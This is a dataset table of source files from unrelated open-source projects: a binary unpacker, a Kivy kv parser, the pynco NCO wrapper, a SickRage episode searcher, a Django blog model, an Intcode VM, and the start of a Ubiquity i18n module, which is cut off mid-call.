| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| decimalbell/devnull | python/sidl/unpacker.py | 1 | 3416 |
import struct
class Unpacker(object):
def __init__(self, buf):
self._buffer = buf
self._offset = 0
self._typemethods = {'b': self.unpack_int8, 'B': self.unpack_uint8,
'h': self.unpack_int16, 'H': self.unpack_uint16,
'i': self.unpack_int32, 'I': self.unpack_uint32,
'q': self.unpack_int64, 'Q': self.unpack_uint64,
'f': self.unpack_float, 'd': self.unpack_double,
's': self.unpack_string, 'm': self.unpack_message,
}
@property
def offset(self):
return self._offset
def unpack_integer(self, fmt):
value = struct.unpack_from(fmt, self._buffer, self._offset)
self._offset = self._offset + struct.calcsize(fmt)
return value[0]
def unpack_int8(self):
return self.unpack_integer('<b')
def unpack_int16(self):
return self.unpack_integer('<h')
def unpack_int32(self):
return self.unpack_integer('<l')
def unpack_int64(self):
return self.unpack_integer('<q')
def unpack_uint8(self):
return self.unpack_integer('<B')
def unpack_uint16(self):
return self.unpack_integer('<H')
def unpack_uint32(self):
return self.unpack_integer('<I')
def unpack_uint64(self):
return self.unpack_integer('<Q')
    def unpack_float(self):
        # floats and doubles travel as length-prefixed strings in this format
        return float(self.unpack_string())
    def unpack_double(self):
        return float(self.unpack_string())
def unpack_string(self):
l = self.unpack_uint16()
s = struct.unpack_from('%ds' % (l,), self._buffer, self._offset)
self._offset = self._offset + l
return s[0].decode('utf-8')
def unpack_binary(self):
l = self.unpack_uint32()
s = struct.unpack_from('%ds' % (l,), self._buffer, self._offset)
self._offset = self._offset + l
return s[0].decode('utf-8')
def unpack_message(self, msg):
msg.unpack(self)
def unpack_list(self, l):
length = self.unpack_uint32()
if l.typecode in l.typecodes[:-1]:
for _ in range(0, length):
value = self._typemethods[l.typecode]()
l.append(value)
elif l.typecode == l.typecodes[-1]:
for _ in range(0, length):
msg = l.type()
self._typemethods[l.typecode](msg)
l.append(msg)
def unpack_set(self, s):
length = self.unpack_uint32()
if s.typecode in s.typecodes[:-1]:
for _ in range(0, length):
value = self._typemethods[s.typecode]()
s.add(value)
elif s.typecode == s.typecodes[-1]:
for _ in range(0, length):
msg = s.type()
self._typemethods[s.typecode](msg)
s.add(msg)
def unpack_dict(self, d):
length = self.unpack_uint32()
for _ in range(0, length):
# key
key = self._typemethods[d.key_typecode]()
# value
if d.value_typecode in d.typecodes[:-1]:
value = self._typemethods[d.value_typecode]()
elif d.value_typecode == d.typecodes[-1]:
value = d.value_type()
self._typemethods[d.value_typecode](value)
d[key] = value
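# A minimal usage sketch (assumption: the little-endian, length-prefixed wire
# format implemented above; the buffer is built by hand for illustration).
def _unpacker_demo():
    import struct
    buf = struct.pack('<H', 5) + b'hello' + struct.pack('<l', -42)
    u = Unpacker(buf)
    assert u.unpack_string() == 'hello'  # uint16 length prefix, then bytes
    assert u.unpack_int32() == -42
    assert u.offset == len(buf)          # offset advanced past both fields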
| mit | -6,304,016,966,791,125,000 | 31.226415 | 79 | 0.522248 | false | 3.78714 | false | false | false |
| kived/kvlang | kvlang/ast_parser.py | 1 | 4502 |
from functools import partial
import weakref
from kivy.compat import iteritems
from kivy.factory import Factory
from kivy.lang import ParserRuleProperty, Parser, ParserException, ParserRule as kivy_ParserRule, Builder as kivy_Builder
from kivy.logger import Logger
from kivy.weakproxy import WeakProxy
from kvlang.kvTree import DirectiveNode, WidgetNode, WidgetLikeNode, PropertyNode, CanvasNode, InstructionNode
class ParserRule(kivy_ParserRule):
__slots__ = ('ast_node', '__weakref__')
def load_ast(self, ast, **kwargs):
kwargs.setdefault('rulesonly', False)
self._current_filename = fn = kwargs.get('filename', None)
if fn in self.files:
Logger.warning(
'kvlang: The file {} is loaded multiple times, '
'you might have unwanted behaviors.'.format(fn))
try:
parser = ASTParser(ast=ast)
self.rules.extend(parser.rules)
self._clear_matchcache()
for name, cls, template in parser.templates:
self.templates[name] = (cls, template, fn)
Factory.register(name, cls=partial(self.template, name), is_template=True)
for name, baseclasses in iteritems(parser.dynamic_classes):
Factory.register(name, baseclasses=baseclasses, filename=fn)
if kwargs['rulesonly'] and parser.root:
filename = kwargs.get('rulesonly', '<string>')
            raise Exception('The file <%s> also contains non-rules '
                            'directives' % filename)
if fn and (parser.templates or
parser.dynamic_classes or parser.rules):
self.files.append(fn)
if parser.root:
widget = Factory.get(parser.root.name)()
self._apply_rule(widget, parser.root, parser.root)
return widget
finally:
self._current_filename = None
Builder_apply_rule = kivy_Builder._apply_rule
def _apply_rule(self, widget, rule, *args, **kwargs):
Builder_apply_rule(widget, rule, *args, **kwargs)
if hasattr(rule, 'ast_node'):
widget.ast_node = rule.ast_node
widget.ast_node.ast_widget = widget.proxy_ref
kivy_Builder._apply_rule = partial(_apply_rule, kivy_Builder)
class ASTParser(Parser):
def __init__(self, **kwargs):
self.ast = kwargs.get('ast', None)
if self.ast is None:
raise ValueError('No AST passed')
kwargs['content'] = self.ast
super(ASTParser, self).__init__(**kwargs)
def execute_directives(self):
for directive in self.ast.find_all(DirectiveNode):
self.directives.append((directive.token.line,
str(directive).strip()[2:]))
super(ASTParser, self).execute_directives()
def parse(self, ast):
lines = ast.source.splitlines()
if not lines:
return
num_lines = len(lines)
lines = list(zip(list(range(num_lines)), lines))
self.sourcecode = lines[:]
self.execute_directives()
rules = self.parse_tree(ast.tree)
for rule in rules:
rule.precompile()
def parse_tree(self, root):
if not root:
return []
nodes = root.children if root.isNil() else [root]
return self.parse_nodes(nodes)
def parse_nodes(self, nodes, level=0):
objects = []
for node in [n for n in nodes if isinstance(n, WidgetLikeNode)]:
ln = node.get_sourceline()
name = str(node)
if (level != 0
and name not in self.PROP_ALLOWED
and any(ord(z) not in self.PROP_RANGE for z in name)):
raise ParserException(self, ln, 'Invalid class name')
current_object = ParserRule(self, ln, name, level)
objects.append(current_object)
node.ast_rule = weakref.proxy(current_object)
current_object.ast_node = weakref.proxy(node)
for child in node.interesting_children():
if isinstance(child, PropertyNode):
name = child.name
value = child.parsevalue
if name == 'id':
if len(value) == 0:
raise ParserException(self, ln, 'Empty id')
if value in ('self', 'root'):
raise ParserException(self, ln,
'Invalid id, cannot be "self" or "root"')
current_object.id = value
elif len(value):
rule = ParserRuleProperty(self, ln, name, value)
if name[:3] == 'on_':
current_object.handlers.append(rule)
else:
current_object.properties[name] = rule
elif isinstance(child, CanvasNode):
canvas = self.parse_nodes([child], level + 2)
setattr(current_object, child.canvas_object, canvas[0])
elif isinstance(child, (WidgetNode, InstructionNode)):
children = self.parse_nodes([child], level + 1)
children_set = getattr(current_object, 'children', [])
children_set += children
current_object.children = children_set
return objects
| mit | -200,474,541,999,551,460 | 29.835616 | 121 | 0.677477 | false | 3.372285 | false | false | false |
| nco/pynco | nco/nco.py | 1 | 19238 |
"""
nco module. Use Nco class as interface.
"""
import distutils.spawn
import os
import re
import shlex
import six
import subprocess
import tempfile
from distutils.version import LooseVersion
class NCOException(Exception):
def __init__(self, stdout, stderr, returncode):
super(NCOException, self).__init__()
self.stdout = stdout
self.stderr = stderr
self.returncode = returncode
self.msg = "(returncode:{0}) {1}".format(returncode, stderr)
def __str__(self):
return self.msg
class Nco(object):
def __init__(
self,
returnCdf=False,
return_none_on_error=False,
force_output=True,
cdf_module="netcdf4",
debug=0,
**kwargs
):
operators = [
"ncap2",
"ncatted",
"ncbo",
"nces",
"ncecat",
"ncflint",
"ncks",
"ncpdq",
"ncra",
"ncrcat",
"ncrename",
"ncwa",
"ncea",
]
if "NCOpath" in os.environ:
self.nco_path = os.environ["NCOpath"]
else:
self.nco_path = os.path.split(distutils.spawn.find_executable("ncks"))[0]
self.operators = operators
self.return_cdf = returnCdf
self.return_none_on_error = return_none_on_error
self.force_output = force_output
self.cdf_module = cdf_module
self.debug = debug
self.outputOperatorsPattern = [
"-H",
"--data",
"--hieronymus",
"-M",
"--Mtd",
"--Metadata",
"-m",
"--mtd",
"--metadata",
"-P",
"--prn",
"--print",
"-r",
"--revision",
"--vrs",
"--version",
"--u",
"--units",
]
self.OverwriteOperatorsPattern = ["-O", "--ovr", "--overwrite"]
self.AppendOperatorsPattern = ["-A", "--apn", "--append"]
# operators that can function with a single file
        self.SingleFileOperatorsPattern = ["ncap2", "ncatted", "ncks", "ncrename"]
self.DontForcePattern = (
self.outputOperatorsPattern
+ self.OverwriteOperatorsPattern
+ self.AppendOperatorsPattern
)
# I/O from call
self.returncode = 0
self.stdout = ""
self.stderr = ""
if kwargs:
self.options = kwargs
else:
self.options = None
def __dir__(self):
res = dir(type(self)) + list(self.__dict__.keys())
res.extend(self.operators)
return res
def call(self, cmd, inputs=None, environment=None, use_shell=False):
inline_cmd = cmd
if inputs is not None:
if isinstance(inputs, str):
inline_cmd.append(inputs)
else:
# assume it's an iterable
inline_cmd.extend(inputs)
if self.debug:
print("# DEBUG ==================================================")
if environment:
for key, val in list(environment.items()):
print("# DEBUG: ENV: {0} = {1}".format(key, val))
print("# DEBUG: CALL>> {0}".format(" ".join(inline_cmd)))
print("# DEBUG ==================================================")
        # if we're using the shell then we need to pass a single string as the command rather than an iterable
if use_shell:
inline_cmd = " ".join(inline_cmd)
try:
proc = subprocess.Popen(
inline_cmd,
shell=use_shell,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=environment,
)
except OSError:
# Argument list may have been too long, so don't use a shell
proc = subprocess.Popen(
inline_cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=environment,
)
retvals = proc.communicate()
return {
"stdout": retvals[0],
"stderr": retvals[1],
"returncode": proc.returncode,
}
def has_error(self, method_name, inputs, cmd, retvals):
if self.debug:
print(
"# DEBUG: RETURNCODE: {return_code}".format(
return_code=retvals["returncode"]
)
)
if retvals["returncode"] != 0:
print("Error in calling operator {method} with:".format(method=method_name))
print(">>> {command} <<<".format(command=" ".join(cmd)))
print("Inputs: {0!s}".format(inputs))
print(retvals["stderr"])
return True
else:
return False
def __getattr__(self, nco_command):
# shortcut to avoid calling auto_doc decorator if command doesn't exist
if nco_command not in self.operators:
raise AttributeError("Unknown command: {cmd}".format(cmd=nco_command))
        # first run the auto_doc decorator, which runs the command with the --help option in order to pull in usage info
@auto_doc(nco_command, self)
def get(self, input, **kwargs):
"""
This is the function that's called when this __getattr__ "magic" function runs.
Parses options and constructs/calls an appropriate/corresponding NCO command.
:param self:
:param input:
:param kwargs:
:return:
"""
options = kwargs.pop("options", [])
force = kwargs.pop("force", self.force_output)
output = kwargs.pop("output", None)
environment = kwargs.pop("env", None)
debug = kwargs.pop("debug", self.debug)
return_cdf = kwargs.pop("returnCdf", False)
return_array = kwargs.pop("returnArray", False)
return_ma_array = kwargs.pop("returnMaArray", False)
operator_prints_out = kwargs.pop("operator_prints_out", False)
use_shell = kwargs.pop("use_shell", True)
# build the NCO command
# 1. the NCO operator
cmd = [os.path.join(self.nco_path, nco_command)]
if options:
for option in options:
if isinstance(option, str):
cmd.extend(str.split(option))
elif hasattr(option,"prn_option"):
cmd.extend(option.prn_option().split())
else:
# assume it's an iterable
cmd.extend(option)
if debug:
if type(debug) == bool:
# assume debug level is 3
cmd.append("--nco_dbg_lvl=3")
elif type(debug) == int:
cmd.append("--nco_dbg_lvl={0}".format(debug))
else:
raise TypeError(
"Unknown type for debug: \
{0}".format(
type(debug)
)
)
if output and force and os.path.isfile(output):
# make sure overwrite is set
if debug:
print("Overwriting file: {0}".format(output))
if any([i for i in cmd if i in self.DontForcePattern]):
force = False
else:
force = False
# 2b. all other keyword args become options
if kwargs:
for key, val in list(kwargs.items()):
if val and type(val) == bool:
cmd.append("--{0}".format(key))
if cmd[-1] in self.DontForcePattern:
force = False
elif (
isinstance(val, str)
or isinstance(val, int)
or isinstance(val, float)
):
cmd.append("--{option}={value}".format(option=key, value=val))
else:
# we assume it's either a list, a tuple or any iterable
cmd.append(
"--{option}={values}".format(
option=key, values=",".join(val)
)
)
# 2c. Global options come in
if self.options:
for key, val in list(self.options.items()):
if val and type(val) == bool:
cmd.append("--" + key)
elif isinstance(val, str):
cmd.append("--{0}={1}".format(key, val))
else:
# we assume it's either a list, a tuple or any iterable
cmd.append("--{0}={1}".format(key, ",".join(val)))
# 3. Add in overwrite if necessary
if force:
cmd.append("--overwrite")
# Check if operator appends
operator_appends = False
for piece in cmd:
if piece in self.AppendOperatorsPattern:
operator_appends = True
# If operator appends and NCO version >= 4.3.7, remove -H -M -m
# and their ancillaries from outputOperatorsPattern
if operator_appends and nco_command == "ncks":
nco_version = self.version()
if LooseVersion(nco_version) >= LooseVersion("4.3.7"):
self.outputOperatorsPattern = [
"-r",
"--revision",
"--vrs",
"--version",
]
# Check if operator prints out
for piece in cmd:
if piece in self.outputOperatorsPattern:
operator_prints_out = True
if operator_prints_out:
retvals = self.call(cmd, inputs=input)
self.returncode = retvals["returncode"]
self.stdout = retvals["stdout"]
self.stderr = retvals["stderr"]
if not self.has_error(nco_command, input, cmd, retvals):
return retvals["stdout"]
# parsing can be done by 3rd party
else:
if self.return_none_on_error:
return None
else:
raise NCOException(**retvals)
else:
if output is not None:
if isinstance(output, str):
cmd.append("--output={0}".format(output))
else:
# we assume it's an iterable.
                        if len(output) > 1:
                            raise TypeError(
                                "Only one output allowed, must be a string "
                                "or a length-1 iterable. Received output: "
                                "{out} with a type of {type}".format(
                                    out=output, type=type(output)
                                )
                            )
                        # extending cmd with a raw string would add it one
                        # character at a time; append the single element
                        cmd.append("--output={0}".format(list(output)[0]))
elif not (nco_command in self.SingleFileOperatorsPattern):
# create a temporary file, use this as the output
file_name_prefix = nco_command + "_" + input.split(os.sep)[-1]
tmp_file = tempfile.NamedTemporaryFile(
mode="w+b", prefix=file_name_prefix, suffix=".tmp", delete=False
)
output = tmp_file.name
cmd.append("--output={0}".format(output))
retvals = self.call(
cmd, inputs=input, environment=environment, use_shell=use_shell
)
self.returncode = retvals["returncode"]
self.stdout = retvals["stdout"]
self.stderr = retvals["stderr"]
if self.has_error(nco_command, input, cmd, retvals):
if self.return_none_on_error:
return None
else:
print(self.stdout)
print(self.stderr)
raise NCOException(**retvals)
if return_array:
return self.read_array(output, return_array)
elif return_ma_array:
return self.read_ma_array(output, return_ma_array)
elif self.return_cdf or return_cdf:
if not self.return_cdf:
self.load_cdf_module()
return self.read_cdf(output)
else:
return output
if (nco_command in self.__dict__) or (nco_command in self.operators):
if self.debug:
print("Found method: {0}".format(nco_command))
# cache the method for later
setattr(self.__class__, nco_command, get)
return get.__get__(self)
else:
# If the method isn't in our dictionary, act normal.
print("#=====================================================")
print("Cannot find method: {0}".format(nco_command))
raise AttributeError("Unknown method {0}!".format(nco_command))
def load_cdf_module(self):
if self.cdf_module == "netcdf4":
try:
import netCDF4 as cdf
self.cdf = cdf
except Exception:
                raise ImportError(
                    "Could not load python-netcdf4 - try "
                    "setting cdf_module='scipy'"
                )
elif self.cdf_module == "scipy":
try:
import scipy.io.netcdf as cdf
self.cdf = cdf
except Exception:
                raise ImportError(
                    "Could not load scipy.io.netcdf - try "
                    "setting cdf_module='netcdf4'"
                )
else:
raise ValueError(
"Unknown value provided for cdf_module. Valid "
"values are 'scipy' and 'netcdf4'"
)
def set_return_array(self, value=True):
self.returnCdf = value
if value:
self.load_cdf_module()
def unset_return_array(self):
self.set_return_array(False)
def has_nco(self, path=None):
if path is None:
path = self.nco_path
if os.path.isdir(path) and os.access(path, os.X_OK):
return True
else:
return False
def check_nco(self):
if self.has_nco():
call = [os.path.join(self.nco_path, "ncra"), "--version"]
proc = subprocess.Popen(
" ".join(call), stderr=subprocess.PIPE, stdout=subprocess.PIPE
)
retvals = proc.communicate()
print(retvals)
def set_nco_path(self, value):
self.nco_path = value
def get_nco_path(self):
return self.nco_path
# ==================================================================
# Additional operators:
# ------------------------------------------------------------------
@property
def module_version(self):
return "0.0.0"
def version(self):
# return NCO's version
proc = subprocess.Popen(
[os.path.join(self.nco_path, "ncra"), "--version"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
ret = proc.communicate()
ncra_help = ret[1]
if isinstance(ncra_help, bytes):
ncra_help = ncra_help.decode("utf-8")
match = re.search(r"NCO netCDF Operators version (\d.*) ", ncra_help)
# some versions write version information in quotation marks
if not match:
match = re.search(r'NCO netCDF Operators version "(\d.*)" ', ncra_help)
return match.group(1).split(" ")[0]
def read_cdf(self, infile):
"""Return a cdf handle created by the available cdf library.
python-netcdf4 and scipy supported (default:scipy)"""
if not self.return_cdf:
self.load_cdf_module()
if self.cdf_module == "scipy":
# making it compatible to older scipy versions
file_obj = self.cdf.netcdf_file(infile, mode="r")
elif self.cdf_module == "netcdf4":
file_obj = self.cdf.Dataset(infile)
else:
raise ImportError(
"Could not import data \
from file {0}".format(
infile
)
)
return file_obj
def open_cdf(self, infile):
"""Return a cdf handle created by the available cdf library.
        python-netcdf4 and scipy supported (default:scipy)"""
if not self.return_cdf:
self.load_cdf_module()
if self.cdf_module == "scipy":
# making it compatible to older scipy versions
print("Use scipy")
file_obj = self.cdf.netcdf_file(infile, mode="r+")
elif self.cdf_module == "netcdf4":
print("Use netcdf4")
file_obj = self.cdf.Dataset(infile, "r+")
else:
raise ImportError(
"Could not import data \
from file: {0}".format(
infile
)
)
return file_obj
def read_array(self, infile, var_name):
"""Directly return a numpy array for a given variable name"""
file_handle = self.read_cdf(infile)
try:
# return the data array
return file_handle.variables[var_name][:]
except KeyError:
print("Cannot find variable: {0}".format(var_name))
raise KeyError
def read_ma_array(self, infile, var_name):
"""Create a masked array based on cdf's FillValue"""
file_obj = self.read_cdf(infile)
# .data is not backwards compatible to old scipy versions, [:] is
data = file_obj.variables[var_name][:]
# load numpy if available
try:
import numpy as np
except Exception:
raise ImportError("numpy is required to return masked arrays.")
if hasattr(file_obj.variables[var_name], "_FillValue"):
# return masked array
fill_val = file_obj.variables[var_name]._FillValue
retval = np.ma.masked_where(data == fill_val, data)
else:
# generate dummy mask which is always valid
retval = np.ma.array(data)
return retval
def auto_doc(tool, nco_self):
"""
Generate the __doc__ string of the decorated function by calling the nco help command
:param tool:
:param nco_self:
:return:
"""
def desc(func):
func.__doc__ = nco_self.call([tool, "--help"]).get("stdout")
return func
return desc
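# A usage sketch (assumes NCO binaries such as ncks are installed and on the
# PATH; the file and variable names are illustrative, not part of this module):
#
#     nco = Nco()
#     out = nco.ncks(input="in.nc", output="out.nc",
#                    options=["-v", "temperature"])
#     print(nco.version())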
| mit | -416,057,038,847,101,900 | 34.429098 | 117 | 0.477025 | false | 4.599092 | false | false | false |
| CristianBB/SickRage | sickbeard/dailysearcher.py | 1 | 4268 |
# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: https://sickrage.github.io
# Git: https://github.com/SickRage/SickRage.git
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import datetime
import threading
import sickbeard
from sickbeard import logger
from sickbeard import db
from sickbeard import common
from sickbeard import network_timezones
from sickrage.show.Show import Show
from sickrage.helper.exceptions import MultipleShowObjectsException
class DailySearcher():
def __init__(self):
self.lock = threading.Lock()
self.amActive = False
def run(self, force=False):
"""
Runs the daily searcher, queuing selected episodes for search
:param force: Force search
"""
if self.amActive:
return
self.amActive = True
logger.log(u"Searching for new released episodes ...")
if not network_timezones.network_dict:
network_timezones.update_network_dict()
if network_timezones.network_dict:
curDate = (datetime.date.today() + datetime.timedelta(days=1)).toordinal()
else:
curDate = (datetime.date.today() + datetime.timedelta(days=2)).toordinal()
curTime = datetime.datetime.now(network_timezones.sb_timezone)
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE status = ? AND season > 0 AND (airdate <= ? and airdate > 1)",
[common.UNAIRED, curDate])
sql_l = []
show = None
for sqlEp in sqlResults:
try:
if not show or int(sqlEp["showid"]) != show.indexerid:
show = Show.find(sickbeard.showList, int(sqlEp["showid"]))
                # for when there are orphaned series in the database that are not loaded into our showlist
if not show or show.paused:
continue
except MultipleShowObjectsException:
logger.log(u"ERROR: expected to find a single show matching " + str(sqlEp['showid']))
continue
if show.airs and show.network:
# This is how you assure it is always converted to local time
air_time = network_timezones.parse_date_time(sqlEp['airdate'], show.airs, show.network).astimezone(network_timezones.sb_timezone)
# filter out any episodes that haven't started airing yet,
# but set them to the default status while they are airing
# so they are snatched faster
if air_time > curTime:
continue
ep = show.getEpisode(int(sqlEp["season"]), int(sqlEp["episode"]))
with ep.lock:
if ep.season == 0:
logger.log(u"New episode " + ep.prettyName() + " airs today, setting status to SKIPPED because is a special season")
ep.status = common.SKIPPED
else:
logger.log(u"New episode %s airs today, setting to default episode status for this show: %s" % (ep.prettyName(), common.statusStrings[ep.show.default_ep_status]))
ep.status = ep.show.default_ep_status
sql_l.append(ep.get_sql())
if len(sql_l) > 0:
myDB = db.DBConnection()
myDB.mass_action(sql_l)
else:
logger.log(u"No new released episodes found ...")
# queue episode for daily search
dailysearch_queue_item = sickbeard.search_queue.DailySearchQueueItem()
sickbeard.searchQueueScheduler.action.add_item(dailysearch_queue_item)
self.amActive = False
| gpl-3.0 | -8,188,740,517,060,104,000 | 37.45045 | 182 | 0.626992 | false | 4.163902 | false | false | false |
| aileron-split/aileron-web | server/blog/models.py | 1 | 1104 |
from django.db import models
# Blog app models.
class Post(models.Model):
published = models.BooleanField(default=False)
published_date = models.DateTimeField(null=True, blank=True)
slug = models.SlugField(max_length=80)
title = models.CharField(max_length=80, default='Post Title')
subtitle = models.CharField(max_length=200, null=True, blank=True)
summary = models.TextField(default='Post summary.')
content = models.TextField(default='Post content.')
card_sm_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
card_mat_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
card_lg_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
video = models.URLField(null=True, blank=True)
album = models.ForeignKey('gallery.Album', blank=True, null=True)
author = models.ForeignKey('team.Member', blank=True, null=True)
created_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
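# A usage sketch (hypothetical queryset, not part of this module): a list
# view would typically fetch only published posts, newest first.
#
#     posts = Post.objects.filter(published=True).order_by('-published_date')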
| gpl-3.0 | 2,635,139,199,670,405,000 | 47 | 88 | 0.71558 | false | 3.631579 | false | false | false |
| BrendanLeber/adventofcode | 2019/09-sensor_boost/intcode.py | 1 | 7073 |
# -*- coding: utf-8 -*-
import pdb
import sys
import traceback
from collections import deque
from enum import IntEnum
from typing import Deque, Dict, List, NamedTuple, Optional, Tuple, Union
class ParameterMode(IntEnum):
POSITIONAL = 0
IMMEDIATE = 1
RELATIVE = 2
class ParameterType(IntEnum):
READ = 0
WRITE = 1
class InstructionInfo(NamedTuple):
name: str
params: Tuple[ParameterType, ...]
INSTRUCTIONS: Dict[int, InstructionInfo] = {
1: InstructionInfo("add", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
2: InstructionInfo("mul", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
3: InstructionInfo("in", (ParameterType.WRITE,)),
4: InstructionInfo("out", (ParameterType.READ,)),
5: InstructionInfo("jnz", (ParameterType.READ, ParameterType.READ)),
6: InstructionInfo("jz", (ParameterType.READ, ParameterType.READ)),
7: InstructionInfo("lt", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
8: InstructionInfo("eq", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
9: InstructionInfo("rbo", (ParameterType.READ,)),
99: InstructionInfo("halt", tuple()),
}
class Intcode:
def __init__(self, program: List[int]) -> None:
self.ip: int = 0
self.program: List[int] = program[:]
self.tape: List[int] = program[:]
# add extra memory space for data buffer
self.tape += [0] * max(1024, len(self.program) * 3)
self.relative_base: int = 0
self.last_output: Optional[int] = None
self.last_input: Optional[int] = None
self.chained_mode: bool = False
self.inputs: Deque = deque()
# self.execution_trace: Dict[int, str] = {}
def _disasm(self) -> str:
addr = f"{self.ip:5}"
opcode = self.tape[self.ip] % 100
opname = INSTRUCTIONS[opcode].name
params = []
mask = 10
for pnum, ptype in enumerate(INSTRUCTIONS[opcode].params, 1):
mask *= 10
pmode = ParameterMode((self.tape[self.ip] // mask) % 10)
if ptype == ParameterType.WRITE:
leader = "$"
elif pmode == ParameterMode.POSITIONAL:
leader = "$"
elif pmode == ParameterMode.RELATIVE:
leader = "@"
else:
leader = ""
params.append(f"{leader}{self.tape[self.ip + pnum]}")
return addr + ": " + f"{opname} " + ", ".join(params)
def decode_instruction(self) -> Tuple[int, List[int]]:
"""Decode the opcode and the arguments for this instruction."""
opcode: int = self.tape[self.ip] % 100
arguments: List[int] = []
mask: int = 10
# start at 1 to skip the opcode in the instruction
for param_num, param_type in enumerate(INSTRUCTIONS[opcode].params, 1):
mask *= 10
param_mode: ParameterMode = ParameterMode((self.tape[self.ip] // mask) % 10)
if param_type == ParameterType.WRITE:
position = self.tape[self.ip + param_num]
if param_mode == ParameterMode.RELATIVE:
position += self.relative_base
arguments.append(position)
elif param_mode == ParameterMode.POSITIONAL:
position = self.tape[self.ip + param_num]
arguments.append(self.tape[position])
elif param_mode == ParameterMode.IMMEDIATE:
arguments.append(self.tape[self.ip + param_num])
elif param_mode == ParameterMode.RELATIVE:
position = self.tape[self.ip + param_num] + self.relative_base
arguments.append(self.tape[position])
else:
raise TypeError(f"unknown parameter mode {param_mode}")
return (opcode, arguments)
def execute(self) -> Union[Optional[int], bool]:
"""Execute the instructions contained in the VM memory."""
while self.ip < len(self.program):
# self.execution_trace[self.ip] = self._disasm()
opcode, params = self.decode_instruction()
if opcode == 1:
self.tape[params[2]] = params[0] + params[1]
self.ip += 1 + len(params)
elif opcode == 2:
self.tape[params[2]] = params[0] * params[1]
self.ip += 1 + len(params)
elif opcode == 3:
if self.chained_mode and self.inputs:
value = self.inputs.popleft()
else:
value = int(input("$ "))
self.last_input = self.tape[params[0]] = value
self.ip += 1 + len(params)
elif opcode == 4:
self.last_output = params[0]
self.ip += 1 + len(params)
if self.chained_mode:
return True
else:
print(self.last_output)
elif opcode == 5:
self.ip = params[1] if params[0] else self.ip + 1 + len(params)
elif opcode == 6:
self.ip = params[1] if not params[0] else self.ip + 1 + len(params)
elif opcode == 7:
self.tape[params[2]] = 1 if params[0] < params[1] else 0
self.ip += 1 + len(params)
elif opcode == 8:
self.tape[params[2]] = 1 if params[0] == params[1] else 0
self.ip += 1 + len(params)
elif opcode == 9:
self.relative_base += params[0]
self.ip += 1 + len(params)
elif opcode == 99:
if self.chained_mode:
return False
else:
return self.last_output
raise EOFError("reached end of tape without finding halt instruction.")
def reset(self) -> None:
"""Reset the VM state before starting a new execution."""
self.tape = self.program[:]
# add extra memory space for data buffer
self.tape += [0] * max(1024, len(self.program) * 3)
self.ip = 0
self.relative_base = 0
# self.execution_trace = {}
def set_inputs(self, inputs: List[int]) -> None:
"""Set the inputs for the VM to read."""
self.inputs = deque(inputs)
def set_noun_and_verb(self, noun: int, verb: int) -> None:
"""Set the noun and verb to initialize the program."""
self.tape[1] = noun
self.tape[2] = verb
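# A minimal smoke test (hypothetical three-word program, not puzzle input):
# "104,42,99" outputs the immediate value 42 and halts, so execute() returns
# the last output.
def _intcode_smoke_test() -> None:
    vm = Intcode([104, 42, 99])
    assert vm.execute() == 42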
if __name__ == "__main__":
program: List[int] = []
with open(sys.argv[1]) as inf:
for line in inf:
program += list(map(int, line.strip().split(",")))
try:
vm = Intcode(program)
vm.execute()
# addrs = list(vm.execution_trace.keys())
# addrs.sort()
# for addr in addrs:
# print(f"{vm.execution_trace[addr]}")
# for ip in range(addrs[-1] + 1, len(vm.program)):
# print(f"{ip:5d}: {vm.program[ip]}")
except Exception:
traceback.print_exc()
pdb.post_mortem()
| mit | -8,612,136,722,465,389,000 | 37.862637 | 93 | 0.548565 | false | 3.846112 | false | false | false |
| Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/ubiquity/ubiquity/i18n.py | 1 | 12630 |
# -*- coding: utf-8; Mode: Python; indent-tabs-mode: nil; tab-width: 4 -*-
# Copyright (C) 2006, 2007, 2008 Canonical Ltd.
# Written by Colin Watson <cjwatson@ubuntu.com>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import re
import subprocess
import codecs
import os
import locale
import sys
from ubiquity import misc, im_switch
# if 'just_country' is True, only the country is changing
def reset_locale(frontend, just_country=False):
frontend.start_debconf()
di_locale = frontend.db.get('debian-installer/locale')
if not di_locale:
# TODO cjwatson 2006-07-17: maybe fetch
# languagechooser/language-name and set a language based on
# that?
di_locale = 'en_US.UTF-8'
if 'LANG' not in os.environ or di_locale != os.environ['LANG']:
os.environ['LANG'] = di_locale
os.environ['LANGUAGE'] = di_locale
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error, e:
print >>sys.stderr, 'locale.setlocale failed: %s (LANG=%s)' % \
(e, di_locale)
if not just_country:
misc.execute_root('fontconfig-voodoo',
